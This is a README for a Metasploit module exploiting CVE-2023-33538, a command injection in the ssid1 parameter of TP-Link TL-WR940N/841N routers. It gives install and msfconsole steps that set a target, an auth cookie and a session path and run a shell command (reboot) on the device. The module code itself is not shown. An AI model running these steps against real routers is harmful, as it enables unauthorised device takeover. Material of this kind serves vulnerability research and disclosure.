CVE-2023-33538 - TP-Link Command Injection Ruby module for Metasploit Framework # CVE-2023-33538 – TP-Link TL-WR940N/841N Command Injection (Metasploit module)
This Metasploit **auxiliary module** targets an authenticated **command injection vulnerability** in TP-Link TL-WR940N V2/V4 and TL-WR841N V8/V10 routers.
The issue lies in the vulnerable `ssid1` parameter used in `WlanNetworkRpm.htm`, which allows injection of arbitrary shell commands.
When successful, it allows the attacker to execute arbitrary commands on the device.
More information about the CVE:
https://nvd.nist.gov/vuln/detail/CVE-2023-33538
---
## How to run this module?
1. Copy the `.rb` file into your Metasploit modules folder, for example:
```bash
cp tplink_ssid1_rce.rb/usr/share/metasploit-framework/modules/auxiliary/admin/http/
```
2. Start Metasploit console:
```bash
msfconsole
```
3. Search and use the module:
```bash
search tplink
use auxiliary/admin/http/tplink_ssid1_rce
```
4. Set required options:
```
set RHOSTS 192.168.0.1
set RPORT 80
set AUTHCOOKIE Basic%20YWRtaW46YWRtaW4%3D
set SESSIONPATH /ABCD1234/
set CMD reboot
run
```
> The module **does not** perform authentication. You must manually extract the `Authorization` cookie and session prefix from a successful login to the router's web interface.
---
## References
- https://nvd.nist.gov/vuln/detail/CVE-2023-33538
- https://web.archive.org/web/20230609111043/https://github.com/a101e-IoTvul/iotvul/blob/main/tp-link/3/TL-WR940N_TL-WR841N_userRpm_WlanNetworkRpm_Command_Injection.md
---
## Disclaimer
This module is intended **for educational purposes only**.
**Do not use this code against devices or infrastructure you do not own or have explicit permission to test.**
---
## Issues
If you find bugs, or have ideas for improvements – feel free to open an issue or leave a comment.
[4.0K] /data/pocs/f8d2b4aefeab2339a7d559e4dfb7ddeed5d4e227
├── [1.7K] README.md
└── [2.9K] tplink_ssid1_rce.rb
0 directories, 2 files